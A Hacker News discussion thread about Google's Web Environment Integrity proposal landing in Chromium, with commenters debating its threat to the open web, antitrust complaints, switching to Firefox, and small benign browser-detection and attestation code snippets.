Google is already pushing WEI into Chromium
1375 points | 6 days ago | by topshelf | github.com
Why do you think they don't have consensus or approval from all the people that matter? This is far too big for that. Google, Apple, Microsoft, Cloudflare, etc, are all working together on this. Governments will like it for 'security', and 99% of users won't care.
It's small, but here's a real actionable item that you can do to help:
Put a gentle 'Use Firefox' (or any other non-Chromium-based browser) message on your website. It doesn't have to be in-your-face, just something small.
I've taken my own advice and added it to my own website: https://geeklaunch.io/
(It only appears on Chromium-based browsers.)
We can slowly turn the tide, little by little.
I find this comment a bit funny given that you use Google Tag Manager on your website :)
I like this idea, but has Mozilla said anything about their position in all of this? I'm a Firefox user, but I haven't felt great about Mozilla in quite a while. I'd love to know they are on the right side of this issue before I start promoting them like this.
> It only appears on Chromium-based browsers.
Small anecdote: I am not sure how you're detecting the browser, but this note still appears in Orion (a WebKit-based browser) while it does not in Safari. It persists even when I explicitly change the user agent to Firefox or Safari.
For people who want to put something like this, here is the code snippet:
<span id='browser' class='hidden'>
This website is designed for <a target='_blank' rel='noopener noreferrer' href='https://firefox.com/'>Firefox</a>, a web browser that respects your privacy.
</span>
<script>
if (window.chrome) {
document.getElementById('browser').className = '';
}
</script>
The .hidden class must hide the element somehow; in this case I use: .hidden { display: none; }
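On the detection note above: window.chrome is also defined by some non-Chromium browsers that emulate it (which may explain the Orion behaviour), so it can misfire. A hedged alternative sketch, assuming the Chromium-only User-Agent Client Hints API (navigator.userAgentData) is available, keeping window.chrome only as a fallback:
<script>
  // Sketch, with assumptions: navigator.userAgentData (User-Agent Client Hints) is
  // currently exposed only by Chromium-based browsers, and its brands list contains
  // an entry named 'Chromium' for them. window.chrome alone can misfire, since some
  // non-Chromium browsers define it for compatibility.
  var isChromium = false;
  if (navigator.userAgentData && navigator.userAgentData.brands) {
    isChromium = navigator.userAgentData.brands.some(function (b) {
      return b.brand === 'Chromium';
    });
  } else if (window.chrome) {
    // Fallback heuristic for older Chromium builds without userAgentData.
    isChromium = true;
  }
  if (isChromium) {
    document.getElementById('browser').className = '';
  }
</script>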
I don't think most people know the difference between Chrome and Firefox, and if they can still use the websites they use after that change, they just won't bother.
Even if you explain the difference, 99% of them will forget it the next day.
It's just pointless. With this kind of overreach, only government intervention and regulation can help. Google is not something you can go against with your proverbial wallet; they are too big.
The issue with that is that most people here will only have their own website or product, which is already aimed at more tech-savvy people, who will already have made a conscious decision to use Firefox, Chrome, or whichever browser they prefer.
But we / this site only represents a small percentage. 85% market share means there are hundreds of millions, if not billions of users that would have to switch to make any kind of impact.
And you can't do that without being a very large company with an operating system or the most popular search engine or other ways to constantly tell people to use your browser, no matter how good or privacy conscious or whatever your own is.
If this isn't the straw that breaks the camel's back, there is never going to be one.
Google needs to be broken up.
They own the browser market. They own the web (through AdWords). They own Search. They own mobile. They own most of the video-sharing market, with 2.5 billion monthly active users. They own a good chunk of email, with 1.2 billion monthly active users.
They have amassed an incomprehensible amount of power and influence over humanity and they have proven repeatedly that they are willing to use that power to the detriment of humanity and to entrench themselves further.
Google needs to be broken up.
> Google needs to be broken up.
Not going to happen. Rationally there should be broad political consensus about cutting Google back to size: from rabid libertarians worshiping the miraculous abundance generated by 'competition and free markets' to bleeding-heart socialists keen on pushing back corporate power as the root of all evil.
Alas, these political categories no longer have any meaning. The US political system has mutated into something else (the messenger being a horned man) which will probably require some time to properly characterize and name using terminology that is appropriate to use in good company.
So the fate of Google will be more shaped by actions of external entities than as part of US regulatory efforts. Powerful countries that antagonize the US are simply degoogling and creating their own copycat panopticons.
The question is what will be the course of action of powerful countries that are allies of the US (i.e. Europe and a few others). Will they accept that their digital society will be feudal in nature because the broken US political system cannot deliver on even basic responsibilities?
Don't forget transport, increasingly: soon you won't be able to get a taxi in SF without being monitored/tracked by Google.
What would it mean for Chrome to be spun-off into a separate business? How would it survive?
Google broke itself up in 2015. What are you even asking for here?
Chrome and Android are open source, and there are several forks of both thriving in the ecosystem. Yeah it would be cool if there was a decent open source alternative to GMail and Drive, but no one else seems to have figured out how to get the incentives right for something like that.
Why should the US break up an asset like Google? It would be completely self-defeating. This isn't like Standard Oil or AT&T, which mostly had influence and market share inside the US. It would basically be handing power to foreign competitors, who would pounce at the opportunity.
And I'm not American, so it's not even some sort of patriotic comment. If Europe, or anywhere else, had a Google-sized behemoth, they wouldn't mess with it no matter how 'anti-tech' they might seem now. If anything, they are anti-tech because they don't want foreign big tech to have massive influence over them. You can bet they wouldn't cripple big tech if it were European. On the other hand, as long as these companies are American, that massive power is a feature, not a bug, for the US government.
The reaction to Tiktok is a good example of how nationalism/geopolitics shape the reaction to big tech, which is why google is probably safe.
> Google needs to be broken up.
To make it explicit: the only way this happens is by Americans voting for it. The FTC has been more active on anti-trust issues in the past two years than at any time in the past 30. That's a direct result of the 2020 election. Elections matter.
That would be a desirable action, but look what happened to Microsoft at the end of the '90s. It was about to be broken up, and in the very end it wasn't. They became dormant and polite, only to strike back some ten years ago with Windows 10, its telemetry, ads and cloud services being pushed onto users whether they like it or not. And somehow, no regulator decided to step in to clean up this company's behavior; everyone seems to be OK with what MS is doing, whether it's the US or the EU. I take it that business and lobbying go extremely well in both markets.
And because of this, I don't believe the US is able to break up Google or the other flagship companies, despite reasons existing for such action.
There's a saying, on the internet nobody knows you're a dog.
WEI is part of a broader movement to make this false - more generally to make an internet where we know you are a human staring at a screen
It turns out having dogs (or more commonly programs and scripts) on the internet is not profitable and not good for business, so corporations want to take dogs off their websites by finding clever ways to attest that a real human with eyeballs is clicking with hands and staring at ads.
Support dog rights. Don't allow for a WEI-dominated web.
The whole narrative about WEI 'proving' you're a human is completely false (and I'd argue a ruse). It only proves you're using a sanctioned OS and browser binary. It does nothing to stop robots being wired-up to devices w/ emulated inputs.
In fact, WEI will make it easier to use a robot w/ a sanctioned software stack since, hey, it's a 'human' per WEI.
The web stopped being open when the W3C accepted EME. Now that Google effectively IS the web, they don't even bother pretending to convince anybody and will just turn the web into another proprietary technology.
> The web stopped being open when W3C accepted EME
The web was more open when to play those videos you had to use a proprietary Flash or Silverlight plugin?
And also, to switch back to Firefox
And what happens when website owners decide supporting Firefox is not worth it?
Firefox's killer feature on mobile is that it supports uBlock Origin, while Chrome doesn't. Browsing the web without it is horrible -- the screen covered in popups with tiny Xes. A decent fraction of the time you can't even read the content underneath. Firefox solves all that.
However.
Try opening any article from The Guardian on Firefox mobile. Even a good phone will start feeling sluggish and laggy and weird. An old phone will just go catatonic, get hot, and OOM the whole browser.
Surely this is partly The Guardian's fault. (Should it surprise me that the paper that poses as 'left' for the upper middle class is also incompatible with anything but corporate software from Big Tech?)
But it's definitely Firefox's fault too. Something is wrong with the implementation. If Chrome can render these sites smoothly, Firefox should be able to.
Firefox would only have an excuse if Google had some special APIs on Android, or were doing something to actively sabotage the Firefox experience. I'm not willing to get quite that paranoid yet.
There are some other browsers, but who the hell wrote them? How much of what you see in the app store is legitimate open source, and how much is OSS that some opportunist put their own trackers into? I'd love a good alternative, but I don't see a lot worth trusting.
So it's Firefox for most things, and Chrome when Firefox gets all slow and laggy. Or, Firefox for news articles, and Chrome for businesses' websites.
Exactly. I use Firefox for everything. It renders all the pages fine and is speedy enough so that I never question its performance. But even if it had some issues, those were minor compared to the danger the web is in now.
I suppose this is more important.
When the usage metrics drop for Chrome-based browsers, they will need to start respecting other users instead of just ignoring them.
Currently they can just ignore those users and carry on as they do, since the rest don't make a dent in their bottom line.
We detached this subthread from https://news.ycombinator.com/item?id=36876504 since that thread broke the site guidelines and this one didn't.
Who has been mismanaged for at least a decade and depends on Google to pay their bills..
I'm a FF user since the early 00's and Firefox will mostly not go away because Google has an interest in using it against monopoly accusations but the reality is bleak..
And the reality is these people ( Google in this case ) are so far removed from any moral compass about the Web ( at least what most people here think of 'the Web' ) that it's near impossible to do anything about it. These companies are huge and from top to bottom there are certain groups that are hired guns to do a job, no matter what 'job' it is, they'll do it, achieve those KPIs, get promoted, get paid. Even for their own detriment in the future, it doesn't matter. Big money now, screw the rest.
Btw, this is how every big company has operated since forever; the only 'news' here is the disproportionate impact their actions have on the world due to their huge size and influence.
I don't see how this will end the 'free web.' No publisher will be forced to use DRM. Anyone can still create a website and make it accessible to anyone for free with an internet connection.
If certain publishers want to require ads to view their content, that seems like their prerogative.
Until Google Search starts punishing sites that don't require a trusted execution environment...
I'm surprised to see so many people in this thread saying 'write a strongly worded letter!' (or something along those lines), and so few saying we need to build a better browser without this crap in it, which has been the traditionally successful answer to attempts to privatize the Web.
Before doing this, Google was careful to make it as difficult as possible to build a replacement for Chrome. Apple struggles to make Safari capable. Mozilla struggles to make Chrome-first websites work in Firefox. Building a new browser is a Herculean task.
Pragmatically, I'm hoping that a Chromium spinoff like Brave (or Edge!? Could MS be the hero we need?) will turn the privacy switches on, WEI off, and get enough market share to make WEI infeasible.
Since this is basically just obfuscation, shouldn't it be possible to break it? Heck, it's not even DRM, so it doesn't fall under the protection of the DMCA.
I realise all the negative effects if this starts becoming a thing, but could someone explain how they propose to technically enforce this 'signed browser binary' requirement? What's stopping me from writing my browser to submit false info? Any encryption keys or hashes present in the 'certified' binaries can be extracted (the binary, after all, needs access to them to use them, right?).
The only way this has the slightest chance of working is in connection with trusted hardware. Microsoft has been trying hard to push TPMs on everyone and failed. What makes them think they'll succeed?
Edge is based on Chromium now, has been for years. Wouldn't be a leap to have TPM enforcement here too.
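To make the attestation point concrete: the reason a home-built browser can't just 'submit false info' is that, in the proposal, the token is signed by a platform attester with a key the page never sees (ideally hardware-backed), and the website verifies that signature server-side. A rough sketch of the round trip as I read the draft explainer; the API name (navigator.getEnvironmentIntegrity), the return type, and the header name are assumptions and may not match what ships:
// Rough sketch, not a shipped API: names below are taken from my reading of the
// draft explainer (navigator.getEnvironmentIntegrity) and may differ in practice.
async function fetchWithAttestation(url) {
  // The browser asks the platform attester to sign a token bound to this request.
  // Without a key that the attester (and ultimately the hardware/TPM) vouches for,
  // a modified browser has nothing valid to put here -- which is why the scheme
  // only "works" on locked-down stacks.
  const token = await navigator.getEnvironmentIntegrity(url); // treated as opaque
  // The site forwards the token to its backend, verifies the attester's signature
  // there, and decides whether to serve content. 'X-Env-Integrity' is made up
  // purely for illustration.
  return fetch(url, { headers: { 'X-Env-Integrity': String(token) } });
}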
Publishing an implementation of a proposed web specification is how all web standards are created or evolve. The same thing happens with WebGPU, WASM, and many before them. Usually with a prefix (ms-, moz-, webkit-,...) and/or locked behind a config setting before standardization.
What is different this time other than it being a feature that is considered user-hostile?
That's not to say we shouldn't oppose this feature, I just wouldn't be up in arms about an implementation existing.
> That's not to say we shouldn't oppose this feature, I just wouldn't be up in arms about an implementation existing.
People aren't up in arms about the process by which web standards become accepted; they are up in arms about this standard moving forward at all, because of its dangerous implications for the web and its outright user-hostility.
I wonder if any web servers or web apps have started to block Chrome users yet.
Another tame article in The Register:
https://www.theregister.com/2023/07/25/google_web_environmen...
Despite the spec's half-baked state, the blowback last week was swift – in the form of a flood of largely critical comments posted to the WEI GitHub repository, and abuse directed at the authors of the proposal. The Google devs' response was to limit comment posting to those who had previously contributed to the repo and to post a Code of Conduct document as a reminder to be civil.
The usual way to deal with opposition these days.
If you want to protest the knife we're driving into your stomach, you can do so, but we need to see credentials and civility.
Limiting posting and asking for civility is the only way for individuals to meaningfully engage with even a mere thousand others. Nothing about the human mind was meant for social internet at the scale of the internet, where there are more distinct voices than you have heartbeats in a lifetime.
Also worth noting that this locks reactions (thumbs up, hearts, etc.) - providing plausible deniability that 'only a small number of people raised concerns about specificTopicX.' Journalists should be more aware of this!
On a separate note, for journalists and others who wish to communicate with the spec's author directly, his public website (which lists a personal email) is one of the other repos on the Github profile under which the specification was published. It's painfully absurd that he wrote this sentence in 2022 [0]:
> I decided to make this an app in the end. This is where my costs started wracking up. I had to pay for a second hand macbook pro to build an iOS app. Apple's strategy with this is obvious, and it clearly works, but it still greatly upsets me that I couldn't just build an app with my linux laptop. If I want the app to persist for longer than a month, and to make it easy for friends to install, I had to pay $99 for a developer account. Come on Apple, I know you want people to use the app story but this is just a little cruel. I basically have to pay $99 a year now just to keep using my little app.
[0] https://benwiser.com/blog/I-just-spent-%C2%A3700-to-have-my-...
"Please be civil while we destroy the web as we know it. We also put earplugs in, just in case."
As wonderful as it has been to have a platform that the entire world is on at once, I'm beginning to conclude that the only way to get back to the web as we knew it is to go back to the days when only a small, geeky subset of the population spent time on here. Back then it wasn't worth it to create massive amounts of garbage content in order to serve ads to unwary search engine users—there weren't enough of us to make money off of!
I think it's time to establish a successor to the web that we can once again call home. This doesn't mean we need to give up on the web or stop using it—it can run in parallel to the mainstream, a niche home for hackers and techies and people who care about freedom. It needs to be simple, like Gemini [0], but also have enough interactive features to enable old-school social apps like HN or the old Reddit. It should have a spec and a governance process that discourages rapid changes—we've learned from hard experience that more features does not mean better.
I realize this sounds like a cop out, and that getting people to use such a thing in sufficient numbers would be extremely difficult. But I'm pretty convinced at this point that the web as we knew it will never come back unless there's a reset—unless we create a new niche tech that isn't big enough for corporations to want to take over.
>I realize this sounds like a cop out, and that getting people to use such a thing in sufficient numbers would be extremely difficult.
In the last few days browsing Fediverse platforms I prefer the smaller communities for that old internet spirit anyway.
What you can do:
- stop using Chrome
- do not implement web DRM on your personal site
- do not use providers like Cloudflare if they will support web DRM
- maybe add a warning on your personal site for Chrome users
Maybe something else?
One problem I find is that all that we do is in a bubble. I can convince a dozen like-minded people about the dangers and actions to take. However, the vast majority of the population is completely oblivious to all this and are negligently complicit in enabling bad behavior. This sort of things need to be discussed on the streets and in mainstream media (not tech media) for regular people to become aware. Remember that during the previous browser wars (IE vs Netscape), it was much more in the open and a lot more people knew.
Get the Wikimedia Foundation on board and make sure Wikipedia and other big MediaWiki hosts refuse to show any content if this feature is detected in the browser.
Also, if you're a distro maintainer, configure the apache and nginx defaults to make this the default behaviour.
Even better: instead of redirecting to a wall of text with a long explanation of the political and technical reasons for this choice, just display a big, loud 'ERROR' message stating that their browser is unsupported due to the presence of this module, plus a small tutorial on how to deactivate it from the about:config page, if available.
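For the 'big, loud ERROR' variant, here is a minimal client-side sketch. It assumes the WEI entry point would surface as navigator.getEnvironmentIntegrity (the name used in the draft explainer); if the shipped name differs, the check needs adjusting:
<script>
  // Sketch only: 'getEnvironmentIntegrity' is the name from the draft explainer
  // and is an assumption here, not a shipped API.
  document.addEventListener('DOMContentLoaded', function () {
    if ('getEnvironmentIntegrity' in navigator) {
      document.body.innerHTML =
        '<h1>ERROR: unsupported browser</h1>' +
        '<p>Your browser implements Web Environment Integrity. ' +
        'This site does not serve content to attesting browsers; ' +
        'check your browser flags for a way to disable the feature.</p>';
    }
  });
</script>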
I do not agree with configuring apache and nginx to do that by default, unless WEI would somehow prevent a server that doesn't understand it from working properly (as far as I can tell, that is not the case). (A system administrator could still change the configuration; this is only about the default setting.)
However, I think the other stuff that you had mentioned would be OK.
Furthermore, a distro maintainer could configure clients by default to disable WEI (or to not include client programs that have WEI).
Is adding a feature-flag really the same as pushing the feature into the browser immediately? It can easily just be part of a SWE needing the flag in place in order to continue work without impacting anything else, even if that thing never ever launches.
In general Google engineers don't tend to work on branches, especially long-running ones. Incremental small code reviews are the expectation. The general process would be to stick things securely behind flags and continue development without turning it on, even if it never ever launches.
Not saying this work should be done -- it shouldn't -- but code being pushed is not the same as 'we're going to make this happen tomorrow, no matter what.'
Yes, because a feature flag shows intent to implement it before any real discussion has taken place with privacy and non-corporate security advocates.
> Is adding a feature-flag really the same as pushing the feature into the browser immediately?
'Don't mind me guys, I'm barely boiling the frog.'
When was the last time you heard Google or anything Google-related backing down from getting their paws in deeper? It's no longer a fallacy when there's a sign next to the slippery slope.
> Is adding a feature-flag really the same as pushing the feature into the browser immediately? It can easily just be part of a SWE needing the flag in place in order to continue work without impacting anything else, even if that thing never ever launches.
Yes, because it's such an anti-consumer issue. It shouldn't exist in the first place, and it should never be merged to master. There's no reason not to keep it on a separate branch if you don't intend to use it.
Companies don't usually make a habit of having their employees work on something they don't intend to pursue.
What, you think they push the flag without the intention of making it happen?
Google depends on AdWords. Other revenue streams are minor in comparison. Chromium is the main moat; Android too, of course. The ~$15 billion to Apple is another, so it's about protecting all of this on mobile. With the demise of AICOA, we cannot hope or expect the EU to deliver. In a sense it's simple: folks have to stop using Google Search in order to preserve the web, and support those who are trying to preserve it. But I would say that. We are doing what we can.
Break it up. Break them all up. We need more disruption, not this codswallop.
Don't just comment and complain, contact your antitrust authority today:
US:
- https://www.ftc.gov/enforcement/report-antitrust-violation
EU:
- https://competition-policy.ec.europa.eu/antitrust/contact_en
UK:
- https://www.gov.uk/guidance/tell-the-cma-about-a-competition...
India:
I admire your optimism. I don't know about the others, but I'll be surprised if the UK one lifts a finger. They are beyond useless.
A customizable form letter would be nice to have, if anyone wants to jump on that. I'm not a great writer in that respect.
Thank you so much for your call to action; just emailed [email protected].
For anyone experiencing barriers to writing the email, my method is below; Bing Chat generated an excellent email that only needed a bit of editing.
1. Open https://vivaldi.com/blog/googles-new-dangerous-web-environme... page in (ugh) Edge.
2. Open Bing Chat sidebar (top right corner); it auto-summarizes the article.
3. My prompt: Using that webpage summary, please write a letter reporting Alphabet for an antitrust violation. Please include the following [this language is from the ftc.gov site]:
Q: What companies or organizations are engaging in conduct you believe violates the antitrust laws? A: Alphabet
Q: Why do you believe this conduct may have harmed competition in violation of the antitrust laws? A: [use the article]
Q: What is your role in the situation? A: I'm a user of the Firefox browser
[edit: line breaks for readability]
Thanks, just emailed the FTC. It was a bit cathartic and now I don't have to be angry about this for the rest of the day, I'd encourage everyone else to do the same.
I think https://competition-policy.ec.europa.eu/antitrust/procedures... would be better for contacting EU antitrust.
Here you can specifically create new antitrust complaints.
One thing about this that I don't understand is how they intend to validate memory without controlling the entire stack (which we aren't even 1% of the way to achieving on the desktop). If I poke /dev/mem, does that mean Chrome will have to validate every single byte of its RAM? Or does it rely on having a fully locked-down environment (maybe feasible on phones)?
Even on Windows, you can do practically anything with a signed driver.
There's just no such thing as verifying a 'secure environment' outside of extremely narrow, controlled scenarios.
Disappointing to see such a 180 on 'don't be evil'.
I'm recommending Mozilla Firefox to all friends and family.
Unfortunately, Firefox's UI/UX still isn't great.
The last time I checked, multiple-profile support was somewhat half-baked.
I was just able to finally move my wife back to Firefox. Chrome just stopped working on her Mac. Wouldn't pull up a page. Everything else worked.
She's now happily using Firefox with a non-hobbled version of uBlock Origin.
I do, and I keep having those tiring conversations, but it's really hard to get the point across in layman's terms. I have enough friends in tech who stick with Chrome out of convenience instead of just falling back on it in case something actually doesn't work in Firefox. How do I convince tech-illiterate people to do this?
Is anyone else working on alternatives to this web? We're going to want something working before this one becomes a telescreen.
I'm thinking:
- content addressing, not server addressing (to better distribute the hosting load)
- looser coupling between data itself and apps for viewing data (to prevent aesthetics from being used as a heuristic for trustworthiness)
- a native permissionless annotation protocol (p2p trust governs whether annotations appear: if you see an ad, just revoke trust in its author)
- no code execution needed for browsing, fancy features (i.e. the kind of thing you actually need js for) stay optional
I'm curious what design goals other people think are relevant.
I've put barely any thought into it but I think a "localnet" would be better. Your usage is entirely based on calculated geoposition and the userbase is segmented into regions based on user count. More than X0,000 users in any one region and it splits to keep things small. This would be a limitation for hosting content. If you want to send a message out to another person in a different region you'd have to make a deliberate effort to do so and it will be private such as a letter would be.
Idk if that would achieve my goals and honestly I can't plainly state what my goals are. All I know is I get tired of privileged California snobs telling me how things should be in my back 40
There are many arguments against this, but not many bring up the implications for search engines.
If websites implement this, it will effectively make building a web search engine impossible for new entrants. The current players can whitelist/attest their own clients while categorizing every other scraping client as a bot.
If not for other reasons, I can't see how Google, a search company, can be allowed to push something that can kill competition using its market dominance in other areas like browsers.
> If not for other reasons, I can't see how Google, a search company, can be allowed to push something that can kill competition using its market dominance in other areas like browsers.
Because antitrust has been dead for a while. Chrome is a tool to drive people to Google and Google ads and nothing more.
I will say, I did appreciate Microsoft having its own browser engine with IE and Edge; even if the former was notoriously a pain, it gave competition in the space. Unfortunately, that's not the case anymore, and everything is either Chrome (Blink), Firefox (Gecko), or Safari (WebKit). And it's pretty clear what Chrome has done once they amassed a dominant market share.
I'm sure there are Googlers who think they're legitimately making the web a safer place, but I think the real reason is pretty clear if you take a bird's-eye view.
> The current players can whitelist/attest their own clients while categorizing every other scraping clients as bots.
Can't they already do this by having scrapers send plain-old client certificates? Or even just a request header that contains an HMAC of the URL with a shared secret?
Actually, taking a step further back: why does anyone need to scrape their own properties? They can make up an arbitrary backchannel to access that data — just like the one Google uses to populate YouTube results into SERPs. No need to provide a usefully-scrapeable website at all.
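For readers unfamiliar with the HMAC idea above, a minimal Node.js sketch of a first-party scraper signing its requests with a shared secret; the header name, secret provisioning, and endpoint are all illustrative assumptions:
// Minimal sketch (Node 18+ for global fetch): authenticate "our own bot" with an
// HMAC of the URL under a shared secret. Header name and secret handling are
// illustrative only.
const crypto = require('crypto');

const SHARED_SECRET = process.env.SCRAPER_SECRET; // provisioned out of band

function signedHeaders(url) {
  const mac = crypto.createHmac('sha256', SHARED_SECRET).update(url).digest('hex');
  return { 'X-Scraper-Signature': mac };
}

// The server recomputes the HMAC for the requested URL and compares it in
// constant time before treating the caller as a first-party crawler.
const target = 'https://example.com/page';
fetch(target, { headers: signedHeaders(target) })
  .then((res) => res.text())
  .then((html) => console.log('fetched', html.length, 'bytes'));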
Is it possible for them to implement this API in such a way that it will fail 5% of the time or so, making it impossible for websites to deny individuals based on failing attestation?
https://github.com/RupertBenWiser/Web-Environment-Integrity/...
> The current players can whitelist/attest their own clients while categorizing every other scraping clients as bots.
I hadn't really considered this. In a roundabout way, is there a process for this to be rejected on grounds of 'fair use' limitations?
How would this work against scrapers that drive approved browser instances, e.g. something like Selenium?
This proposal is just so thoroughly user-hostile that it's impossible to criticise it on technical grounds. It's not a bad proposal; it's a dangerous, evil and malicious one, so criticising its details is futile. The whole thing in itself is evil, and it needs to be thrown out. Quietly protesting won't work this time; the goal is to kick up a huge fuss that gets the attention of governments and regulatory bodies and starts antitrust proceedings.
Excuse my French, but Google can fuck off with their censorship and 'reminder to be civil'. They have truly gone mask-off, with Codes of Conduct no longer reinforcing good practice and a welcoming environment, but serving as a tool to suppress dissent.
I've switched to Firefox and I'd recommend everyone else to do so.
As someone that isn't up-to-date on WEI, can someone provide a TLDR of what it does and why it's bad?
> The whole thing in itself is evil, and it needs to be thrown out.
Not only the proposal, but Google itself. Google desperately needs to be broken up.
> This proposal is just so thoroughly user-hostile that it's impossible to criticise it on technical grounds. It's not a bad proposal; it's a dangerous, evil and malicious one, so criticising its details is futile.
I can't agree more strongly. I sat down to write a letter to the FTC, and I can't even articulate my objections, because after reading this spec my only response is encompassed in 'WTF is this shit?'. I've worked in the past with members of the Chromium team and I've generally found them competent and well-meaning, and I can't see any amount of well-meaning (or much competence) in this spec proposal. This feels like a shift in behavior for Google far beyond their existing slow drive to consume everything, to something far more draconian and direct.
Agreed - if anyone else is curious to see Google's 'side' (motivations, technical or otherwise), here's the explainer:
https://github.com/RupertBenWiser/Web-Environment-Integrity/...
It's nakedly user-hostile. A blatant attempt to invert the 'user agent' relationship such that the agent works for the advertiser/corporation/government to spy on the human behind the screen. The way the intro paragraph tries to disguise this as something users need or want is frankly disgusting:
> Users often depend on websites trusting the client environment they run in. This trust may assume that the client environment is honest about certain aspects of itself, keeps user data and intellectual property secure, and is transparent about whether or not a human is using it. This trust is the backbone of the open internet, critical for the safety of user data and for the sustainability of the website's business.
Ugh. Here's a fixed, honest version:
Corporations like Google often depend on advertisers knowing as much as possible about their users. Their revenue may depend on fingerprinting the client environment, tracking their behavior and history, and attesting that a human with sufficient disposable income is behind the keyboard. This personal data mining is the backbone of Google's business model, critical for their continued dominance of the web and for the sustainability of their enormous margins.
How is this feature hostile to Google's users? There is genuine benefit from websites allowing you to do more things via their website (vs. their app). Also: fewer/no CAPTCHAs, fewer bots on social media.
The platforms most people use will see benefits. Apple users apparently already do.
I understand the argument that the open source experience will get worse. But frankly, google.com will still work for you. It will be other websites that make your experience worse.
As someone who is somewhat new to web technologies, can someone really explain why this is bad? I saw the technical discussions in the PRs made to the WEI repo, but it was all so technical that I was not able to understand the arguments made for and against it.
Like any technology, there are both positive and negative aspects of it. The positive take would probably be that this technology is already widely used by iOS and Android apps. People use Apple's AppAttest to e.g. ensure that high scores submitted for a game are from a legitimate copy of the game and not just someone calling the SubmitHighScore API.
But it's absolutely fair to argue that the web operates on a different set of expectations than the Play Store/App Store, and I think the concerns that this will create a second-class citizen status for browsers are totally valid. There's a huge difference in character between 'in order to prevent piracy and ensure ad revenue we are only releasing our app on the Play Store' and 'we are only releasing our web app for Chrome'.
It's like having the "I'm not a robot" button embedded in your web browser.
WEI turns non-compliant browsers into second-class citizens. You're perfectly free to use whatever compliant browser engine and OS combo you like today – but in a world with WEI, you'll have to use Approved Chrome on an Approved OS on Approved Hardware with Approved Signing Keys, or you won't be able to sign into your bank.
It's a change to the browser that gives site-owners the ability to require a positive attestation of non-modification before running. The stated goal of this change is to make it more difficult for end-users to block ads. As the spec states, blocking ads violates the deal you make with content creators to use your attention to ads as a form of payment.
In practice, this will make it harder, but not impossible, to run ad blockers. Now instead of just finding and installing a plugin, you'll have to first find and install a forked browser that implements the attestation as something like 'return true'. This will predictably decrease the number of people blocking ads.
Personally, I don't object to this. The easy solution for most people is simply: don't consume the content. Or pay money instead of watching ads. Content creators, it must be said, also have the option of self-hosting and/or creating content as a hobby rather than a career. As someone who has grown more and more despairing of any paid-for speech, especially by ads, I welcome this change.
Far more troubling is the possibility of attestation for 'important apps' like banking or government. In general, this mechanism gives the org a way to prevent you from doing what you want with your data. For example, they can prevent you from scraping data and automating end-user tasks. This takes away your degrees of freedom, and using a modified browser will certainly become an actionable offense. In my view this is by far the more troubling aspect of this change, since it takes away significant aspects of user autonomy in a context where it matters most.
Technically sophisticated users will note that it's not possible to secure a client, and foolish to try. This misses the point. These changes stochastically change behaviors 'in the large', like a shopping center that offers two lanes in and one lane out, or two escalators in and one out. This represents a net transfer of power from the less powerful to the more powerful, and therefore deserves to be opposed.
EDIT: please don't downvote, but rather reply with your objection.
To put it simply, it makes it possible for a service provider to refuse service to clients that are not corporate-owned, white-listed clients, thus making it virtually impossible to create independent clients for such services.
It will be swiftly adopted by well-meaning but clueless bank and government clerks who will accidentally use it to lock out all open-hardware, open-operating-system, open-browser users, and mandate that you purchase at least one locked-down corporate device just to exist.
It's the trusted computing story all along. Eventually you will need permission to run your code on your own device and such 'unlocked' device will be blocked from accessing any digital infrastructure because it might be otherwise used to breach ToS.
Can someone please explain what this actually is. Without the poetry.
ELI5: Server: Are you a real user capable of viewing ads? Client: Hmmm, not sure. Server: 404
This is about WEI, Web Environment Integrity. The article below sums it up pretty well.
'The proposal suggests that websites should be able to request an attestation from the browser about its "integrity". Such attestations are to be provided by external agents, which – presumably – examine the browser and its plugins, and issue an approval only if those checks pass.
The attestation is sent back to the website, which can now decide to deny service if the agent did not give approval.' [1]
1. https://interpeer.io/blog/2023/07/google-vs-the-open-web
In other words, websites can now force you to comply with their shitty behaviour in order to allow you access; otherwise you get denied access.
From the spec author, in 2022 [0]:
> I decided to make this an app in the end. This is where my costs started wracking up. I had to pay for a second hand macbook pro to build an iOS app. Apple's strategy with this is obvious, and it clearly works, but it still greatly upsets me that I couldn't just build an app with my linux laptop. If I want the app to persist for longer than a month, and to make it easy for friends to install, I had to pay $99 for a developer account. Come on Apple, I know you want people to use the app story but this is just a little cruel. I basically have to pay $99 a year now just to keep using my little app.
The double-think is absolutely astounding.
[0] https://benwiser.com/blog/I-just-spent-%C2%A3700-to-have-my-...
The guy seems to have deleted most of his social accounts. Clearly he values privacy for himself, just not for everyone else.
This is especially surprising coming from a Linux user who presumably understands the desire to have a device that runs code one can read, write, compile, execute, and share freely and without needing to receive approval from a Big Tech gatekeeper.
I don't think it's double-think, it's just a lack of consequential thinking. I believe the writers of the spec when they say that they just want to be able to see which ad views are real or not. They even lay out some (far too weak) ideas to keep the system from being mandatory and abusable. But they don't realize just how quickly things will go out of hand once the rest of the organization realizes what they have created.
The road to hell is paved with good intentions.
This is a crisis of our own making. You don't want Google taking decisions for the web at large? Then don't let them own 85% of the browser market share. When that's the case they don't need W3C or anything to implement whatever they want, they effectively control the client-side internet.
It's proven that mass marketing works. Tell me how a minority of informed and caring users can avoid on their own that a single large scale bad actor pours millions over millions of dollars to convince the uninformed masses about whatever they want. It even happens in actual elections when some factions use misinformation campaigns to alter the average voter's perception! So not an easy task to solve without help.
One of the things that led to Google's current dominance is folks like us (certainly me, at least) pushing folks to replace their default IE installation with Chrome as soon as they set up a new computer.
I hope, pragmatically, something similar might happen with this: say that Brave (my daily driver) disables WEI in their Chromium build, and a new Chromium-derived browser surges in popularity... like judo, using their own power against them.
In the end, I feel like there is a silver lining to all this. As the world wide web becomes more sanitised with their codes of conduct, corporate censorship, ads, witch hunts, all these limitations - more and more, I hope, would the valuable, interesting bits of it drift to alternative locations.
The internets of old were just that - a place where nerds, freaks, outcasts, and other antisocial personalities congregated. Everything was permitted and everything was possible. Many, myself included, hoped that it would change the world. It didn't - the world is winning again, as everyone can clearly see. Still, I hope that the normalisation of the web might as well create a critical mass of those who just want something more than just a corporate safe space.
I sincerely wish for a future where protocols like Gemini -- stripped of all the visual noise and 'dynamic' features -- get a critical mass of users. If that doesn't happen, then as someone who doesn't use any mainstream social media, Google and Microsoft services, LLMs or other modern (and, some might add, dystopian) stuff, I don't really lose much. There are enough great books for a hundred lifetimes, enough hikes to walk and friends to get blasted with. Maybe it'd even be for the better.
That colourful internet of yore coexisted with doing your banking at a bank. Now, banking has largely moved online and banks have eliminated a lot of their physical locations. Ditto for accessing government services in many countries. The concern here is no longer being able to do important everyday things without using a supported browser, even if a small hobbyist internet for nerds, freaks, and outcasts survived out there.
